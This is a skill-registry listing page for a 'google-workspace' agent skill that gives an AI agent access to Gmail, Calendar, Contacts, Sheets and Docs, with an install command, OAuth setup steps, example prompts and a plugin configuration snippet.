ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified productivity Safety 3/5

google-workspace

Interact with Google Workspace services - Gmail, Calendar, Contacts, Sheets, and Docs. Send emails, manage calendar events, read/write spreadsheets, create documents, and sync contacts.

Why use this skill?

Automate your Google Workspace with OpenClaw. Manage Gmail, Calendar, Sheets, and Docs using this powerful agent skill. Easy install with clawhub.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/google-workspace-auqud
Or

What This Skill Does

The Google Workspace skill for OpenClaw acts as a powerful bridge between your local AI agent and your personal or professional Google ecosystem. It provides comprehensive programmatic access to Gmail, Google Calendar, Google Contacts, Google Sheets, and Google Docs. By leveraging OAuth 2.0 authentication, the skill allows your agent to perform complex operations like drafting emails, scheduling meetings, querying spreadsheet data, or creating formatted documents without manual intervention. It serves as a unified interface to automate administrative tasks across the most popular productivity suite in the world.

Installation

To begin, ensure you have the openclaw-agent utility installed (details for Windows/macOS found in the primary documentation). Once the agent is active, run the following command in your terminal: clawhub install openclaw/skills/skills/hightower6eu/google-workspace-auqud. After installation, follow the setup guide to configure your Google Cloud Project. You must enable the Gmail, Calendar, Sheets, Docs, and People APIs in the Google Cloud Console and save your credentials.json file in your working directory. The first time you execute a command, a local server will launch to handle the OAuth authorization flow in your browser.

Use Cases

This skill is designed for high-efficiency users who need to streamline their workflows. Common use cases include: summarizing your unread inbox, automating daily calendar event creation based on project deadlines in a spreadsheet, updating customer contact information in bulk, or generating status reports directly into Google Docs. It is particularly useful for developers or project managers who spend a significant portion of their time managing correspondence and tracking project documentation.

Example Prompts

  1. "Check my Gmail for any unread emails from my manager and provide a short summary of each."
  2. "Look at my calendar for tomorrow and move all my 3 PM meetings to 4 PM, then send a notification to the participants."
  3. "Open the project tracker spreadsheet and add a new row with today's date and the completion status 'In Progress'."

Tips & Limitations

Always handle your credentials.json and token.pickle files with extreme security as they contain sensitive authentication tokens. Note that the skill relies on the openclaw-agent being active; if the agent is not running, API calls will fail. Be mindful of Google's API rate limits, especially when running automated scripts that perform large batch operations on Drive or Sheets. If you encounter authorization errors, delete the token.pickle file and trigger the OAuth flow again to refresh your credentials.

Metadata

Stars2387
Views1
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-google-workspace-auqud": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#google-workspace#automation#productivity#apis#email-management
Safety Score: 3/5

Flags: network-access, file-read, file-write, external-api